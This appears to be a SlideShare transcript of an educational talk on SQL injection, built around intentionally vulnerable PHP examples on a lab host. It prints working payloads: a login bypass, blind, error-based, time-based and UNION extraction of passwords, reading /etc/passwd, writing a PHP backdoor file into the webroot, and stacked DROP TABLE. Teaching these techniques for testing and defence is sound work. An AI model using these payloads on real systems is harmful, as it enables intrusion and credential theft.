![Example of Vulnerable Code
$email=$_POST['email'];
$password=$_POST['password'];
$sql="SELECT * FROM users WHERE (email='$email')";
$sql.=" AND (password='$password')";
$result = mysql_query($sql);
if(mysql_num_rows($result)){
die(header('location: member.php'));
}else{
die(header('HTTP/1.0 401 Unauthorized'));
}
True (Login successful)
HTTP/1.1 302 Found
location: member.php
False (Login failed)
HTTP/1.0 401
Unauthorized
Unvalidated
User Input
Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1"
… WHERE (email='a') AND (password='')||(2>'1')
Always TRUE](https://image.slidesharecdn.com/0kmk4q0wtsegceejsox5-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902124101-phpapp02/85/SQL-Injection-101-It-is-not-just-about-or-1-1-Pichaya-Morimoto-18-320.jpg)
![Example of Vulnerable Code
function search_book($title){
global $con;
$sql = "SELECT * FROM bookshop WHERE title='".$title."'";
$result = mysql_query($sql) or die(mysql_error($con));
if(mysql_num_rows($result)){
return 'found';
}else{
return 'not found';
}
Show Database Error
Message when query
result in an error
}
$book_title = $_GET['title'];
$book_status = search_book($book_title);
echo '<h1>Result: '.$book_status.'</h1>';](https://image.slidesharecdn.com/0kmk4q0wtsegceejsox5-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902124101-phpapp02/85/SQL-Injection-101-It-is-not-just-about-or-1-1-Pichaya-Morimoto-23-320.jpg)
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
- 1. SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
- 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
- 3. Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
- 4. What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
- 5. Very Popular among Hackers
- 6. Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
- 7. Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
- 8. A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
- 9. Tool == Super Easy ?
- 10. Tool == Super Easy ?
- 11. Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
- 12. Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
- 13. SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
- 14. Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
- 15. Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
- 16. Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
- 17. Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
- 18. Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
- 19. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
- 20. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
- 21. Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
- 22. Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
- 23. Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
- 24. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
- 25. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
- 26. Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
- 27. Example of Vulnerable Code
- 28. Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
- 29. Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
- 30. Time-based blind : Exploit sleep() executed !
- 31. UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
- 32. Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
- 33. UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
- 34. UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
- 35. UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
- 36. Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
- 37. Example of Vulnerable Code
- 38. Stacked queries : Exploit
- 39. Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
- 40. SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
- 41. SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
- 42. SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
- 43. Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
- 44. Next Time :s
- 45. Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/